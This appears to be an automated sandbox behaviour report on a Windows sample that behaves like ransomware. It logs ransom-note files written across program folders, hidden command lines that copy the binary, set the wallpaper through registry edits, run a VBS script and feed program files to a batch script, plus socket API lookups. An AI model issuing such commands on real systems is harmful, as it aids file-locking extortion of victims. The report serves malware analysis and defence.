1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning.png | size = 2030 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\reflow.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\reflow.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif | size = 1499 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_super.gif | size = 1968 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\#NOBAD_README#.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\#NOBAD_README#.rtf | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right.gif | size = 1480 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_browser.gif | size = 2567 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif | size = 1501 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\ui-strings.js | size = 4865 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons_2x.png | size = 3135 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\base_uris.js | size = 5349 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-114x114-precomposed.png | size = 6189 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\ui-strings.js | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main.css | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main.css | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\ui-strings.js | size = 5515 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations.png | size = 5901 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\Comb_field_White@1x.png | size = 1959 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\ui-strings.js | size = 2767 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-57x57-precomposed.png | size = 4175 |
|
1 | |
|
For performance reasons, the remaining 4001 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Registry (12)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
2 |
Process (28)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\CIiHmnxMn6Ps\Desktop\cary.exe" "C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe" | os_pid = 0xddc, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\NWI6lHB5.exe" -n | os_pid = 0xe7c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOW |
|
1 | |
| Create | "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hdOYQpCI.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f | os_pid = 0xd98, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\9DndEMsj.vbs" | os_pid = 0xc94, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" | os_pid = 0xd74, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp" | os_pid = 0x40, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" | os_pid = 0xe18, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" | os_pid = 0xea4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Journal.exe" | os_pid = 0x768, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp" | os_pid = 0xa64, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" | os_pid = 0xac8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" | os_pid = 0x858, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" | os_pid = 0xb1c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp" | os_pid = 0x744, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" | os_pid = 0xf0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\PDIALOG.exe" | os_pid = 0x76c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" | os_pid = 0x57c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" | os_pid = 0x6d4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" | os_pid = 0xc70, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" | os_pid = 0x430, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" | os_pid = 0xf08, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Portable Devices\publisherfunnydownloaded.exe" | os_pid = 0x380, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" | os_pid = 0x6f8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp" | os_pid = 0x128, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Mail\wab.exe" | os_pid = 0xd94, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" | os_pid = 0xdfc, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" | os_pid = 0x54c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" | os_pid = 0xcb0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
Module (126)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x75260000 |
|
1 | |
| Load | ws2_32.dll | base_address = 0x769b0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
8 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77ca0000 |
|
8 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x76c90000 |
|
2 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x76a10000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x77150000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x768b0000 |
|
2 | |
| Get Handle | c:\windows\syswow64\combase.dll | base_address = 0x76e40000 |
|
1 | |
| Get Handle | c:\windows\syswow64\shell32.dll | base_address = 0x75430000 |
|
1 | |
| Get Handle | c:\windows\syswow64\wsock32.dll | base_address = 0x74bf0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ws2_32.dll | base_address = 0x769b0000 |
|
5 | |
| Get Handle | c:\windows\syswow64\netapi32.dll | base_address = 0x74bd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\srvcli.dll | base_address = 0x74ba0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\netutils.dll | base_address = 0x74b90000 |
|
1 | |
| Get Handle | c:\users\ciihmnxmn6ps\desktop\cary.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | c:\users\ciihmnxmn6ps\desktop\cary.exe | process_name = c:\users\ciihmnxmn6ps\desktop\cary.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\cary.exe, size = 522 |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\cary.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\cary.exe, size = 261 |
|
12 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadPreferredUILanguages, address_out = 0x752795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPreferredUILanguages, address_out = 0x75279a20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadUILanguage, address_out = 0x7527d980 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x7527a410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExW, address_out = 0x752862d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
2 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x76ca7e70 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x76cf0400 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x76cf1670 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x76cc8460 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x76cc9960 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x76cc9090 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x76cf0910 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x76cf12b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x76cf1510 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x76cbf9d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x76cf1720 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x76cf18c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x76cb4040 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x76cb4b50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x76cbf4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x76cc1740 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x76cb5a80 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x76cf2e50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x76cb20d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x76cb5240 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x76cb5420 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x76cb2080 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstanceEx, address_out = 0x76f0baf0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x76eacd50 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoAddRefServerProcess, address_out = 0x76f0d120 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoReleaseServerProcess, address_out = 0x76f11970 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoResumeClassObjects, address_out = 0x76f16640 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoSuspendClassObjects, address_out = 0x76e81f60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77cf9da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x77d05860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x77d03370 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x74fa2850 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x769bdca0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = __WSAFDIsSet, address_out = 0x769c2f20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = closesocket, address_out = 0x769b9ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ioctlsocket, address_out = 0x769bd860 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAGetLastError, address_out = 0x769c38d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAStartup, address_out = 0x769c2420 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSACleanup, address_out = 0x769bda00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = accept, address_out = 0x769c4030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = bind, address_out = 0x769be0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = connect, address_out = 0x769c33a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getpeername, address_out = 0x769c12c0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockname, address_out = 0x769be030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockopt, address_out = 0x769c1180 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htonl, address_out = 0x769c3670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htons, address_out = 0x769c3650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_addr, address_out = 0x769c2e90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_ntoa, address_out = 0x769c4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = listen, address_out = 0x769c3f40 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohl, address_out = 0x769c3670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohs, address_out = 0x769c3650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recv, address_out = 0x769bcff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recvfrom, address_out = 0x769c4d60 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = select, address_out = 0x769c48e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = send, address_out = 0x769bce20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = sendto, address_out = 0x769c15a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = setsockopt, address_out = 0x769b9560 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = shutdown, address_out = 0x769c14e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = socket, address_out = 0x769b9780 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyaddr, address_out = 0x769dc600 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyname, address_out = 0x769dc790 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobyname, address_out = 0x769db6d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobynumber, address_out = 0x769db820 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyname, address_out = 0x769dcad0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyport, address_out = 0x769dccb0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostname, address_out = 0x769dc920 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getaddrinfo, address_out = 0x769b52b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = freeaddrinfo, address_out = 0x769b4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getnameinfo, address_out = 0x769c16a0 |
|
1 |
System (6532)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = LHNIWSJ |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
16 | |
| Sleep | duration = 1 milliseconds (0.001 seconds) |
|
4 | |
| Sleep | duration = 25 milliseconds (0.025 seconds) |
|
13 | |
| Sleep | duration = 1500 milliseconds (1.500 seconds) |
|
50 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
2 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
3 | |
| Get Time | type = Ticks, time = 118859 |
|
2 | |
| Get Time | type = Local Time, time = 2018-11-10 06:45:54 (Local Time) |
|
4 | |
| Get Time | type = Ticks, time = 118875 |
|
1 | |
| Get Time | type = Ticks, time = 119093 |
|
1 | |
| Get Time | type = Ticks, time = 123796 |
|
2 | |
| Get Time | type = Local Time, time = 2018-11-10 06:45:59 (Local Time) |
|
12 | |
| Get Time | type = Ticks, time = 123859 |
|
1 | |
| Get Time | type = Ticks, time = 123890 |
|
3 | |
| Get Time | type = Ticks, time = 165093 |
|
1 | |
| Get Time | type = Ticks, time = 165109 |
|
2 | |
| Get Time | type = Ticks, time = 165140 |
|
1 | |
| Get Time | type = Ticks, time = 165171 |
|
1 | |
| Get Time | type = Ticks, time = 167375 |
|
10 | |
| Get Time | type = Ticks, time = 167390 |
|
18 | |
| Get Time | type = Ticks, time = 167406 |
|
20 | |
| Get Time | type = Ticks, time = 167421 |
|
12 | |
| Get Time | type = Ticks, time = 167671 |
|
9 | |
| Get Time | type = Ticks, time = 167906 |
|
4 | |
| Get Time | type = Ticks, time = 168031 |
|
16 | |
| Get Time | type = Ticks, time = 168046 |
|
20 | |
| Get Time | type = Ticks, time = 168062 |
|
8 | |
| Get Time | type = Ticks, time = 170109 |
|
4 | |
| Get Time | type = Ticks, time = 170984 |
|
8 | |
| Get Time | type = Ticks, time = 171062 |
|
10 | |
| Get Time | type = Ticks, time = 172937 |
|
2 | |
| Get Time | type = Ticks, time = 173468 |
|
4 | |
| Get Time | type = Ticks, time = 173593 |
|
26 | |
| Get Time | type = Ticks, time = 173609 |
|
30 | |
| Get Time | type = Ticks, time = 173625 |
|
12 | |
| Get Time | type = Ticks, time = 174046 |
|
12 | |
| Get Time | type = Ticks, time = 174062 |
|
6 | |
| Get Time | type = Ticks, time = 174218 |
|
28 | |
| Get Time | type = Ticks, time = 174234 |
|
2 | |
| Get Time | type = Ticks, time = 174250 |
|
12 | |
| Get Time | type = Ticks, time = 174812 |
|
16 | |
| Get Time | type = Ticks, time = 175187 |
|
16 | |
| Get Time | type = Ticks, time = 175734 |
|
10 | |
| Get Time | type = Ticks, time = 175750 |
|
4 | |
| Get Time | type = Ticks, time = 176656 |
|
2 | |
| Get Time | type = Ticks, time = 177156 |
|
4 | |
| Get Time | type = Ticks, time = 179296 |
|
1 | |
| Get Time | type = Ticks, time = 180265 |
|
1 | |
| Get Time | type = Ticks, time = 180468 |
|
2 | |
| Get Time | type = Ticks, time = 180500 |
|
1 | |
| Get Time | type = Ticks, time = 180531 |
|
4 | |
| Get Time | type = Ticks, time = 182546 |
|
14 | |
| Get Time | type = Ticks, time = 182562 |
|
6 | |
| Get Time | type = Ticks, time = 182578 |
|
6 | |
| Get Time | type = Ticks, time = 183109 |
|
4 | |
| Get Time | type = Ticks, time = 183125 |
|
7 | |
| Get Time | type = Ticks, time = 183687 |
|
1 | |
| Get Time | type = Ticks, time = 184015 |
|
5 | |
| Get Time | type = Ticks, time = 184031 |
|
4 | |
| Get Time | type = Ticks, time = 184843 |
|
4 | |
| Get Time | type = Ticks, time = 184859 |
|
8 | |
| Get Time | type = Ticks, time = 185093 |
|
1 | |
| Get Time | type = Ticks, time = 185109 |
|
2 | |
| Get Time | type = Ticks, time = 185125 |
|
4 | |
| Get Time | type = Ticks, time = 185140 |
|
5 | |
| Get Time | type = Ticks, time = 185625 |
|
2 | |
| Get Time | type = Ticks, time = 185671 |
|
24 | |
| Get Time | type = Ticks, time = 185687 |
|
12 | |
| Get Time | type = Ticks, time = 186390 |
|
8 | |
| Get Time | type = Ticks, time = 186578 |
|
6 | |
| Get Time | type = Ticks, time = 186593 |
|
9 | |
| Get Time | type = Ticks, time = 186609 |
|
21 | |
| Get Time | type = Ticks, time = 186625 |
|
2 | |
| Get Time | type = Ticks, time = 187250 |
|
14 | |
| Get Time | type = Ticks, time = 187265 |
|
4 | |
| Get Time | type = Ticks, time = 187625 |
|
10 | |
